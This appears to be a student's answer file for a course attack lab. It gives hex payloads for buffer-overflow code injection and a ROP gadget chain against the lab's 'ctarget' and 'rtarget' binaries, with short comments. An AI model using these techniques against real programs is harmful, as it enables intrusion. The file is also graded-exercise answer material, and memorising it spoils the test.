Ctarget
phase 1
01 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
a0 14 40 00 00 00 00 00
^A^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^T@^@^@^@^@^@

phase 2
68 ce 14 40 00 bf 73 01     /* pushq  $0x4014ce Touch2 add*/
96 78 c3 00 00 00 00 00     /* mov    $0x78960173,%edi cookie */
00 00 00 00 00 00 00 00
38 d6 60 55 00 00 00 00
0:	68 ce 14 40 00       	pushq  $0x4014ce
5:	bf 73 01 96 78       	mov    $0x78960173,%edi
a:	c3                   	retq 
hÎ^T@^@¿s^A<96>xÃ^@^@^@^@^@^@^@^@^@^@^@^@^@8Ö`U^@^@^@^@

phase 3
68 e5 15 40 00 48 c7 c7     /* pushq  $0x4015e5 Touch3 addr */
58 d6 60 55 c3 00 00 00     /* mov    $0x5560d638,%rdi */
00 00 00 00 00 00 00 00
38 d6 60 55 00 00 00 00
37 38 39 36 30 31 37 33 00   /* cookie in hex with null*/
0:	68 e5 15 40 00       	pushq  $0x4015e5
5:	48 c7 c7 38 d6 60 55 	mov    $0x5560d638,%rdi
c:	c3                   	retq 
hå^U@^@HÇÇXÖ`UÃ^@^@^@^@^@^@^@^@^@^@^@8Ö`U^@^@^@^@78960173^@

Rtarget
Phase 4
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
8a 16 40 00 00 00 00 00    /* pop rax func addr */
73 01 96 78 00 00 00 00    /* cookie backward */
97 16 40 00 00 00 00 00    /* mov rax into rdi addr w/ ret */
ce 14 40 00 00 00 00 00    /* touch2 address
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><8a>^V@^@^@^@^@^@s^A<96>x^@^@^@^@<97>^V@^@^@^@^@^@Î^T@^@^@^@^@^@
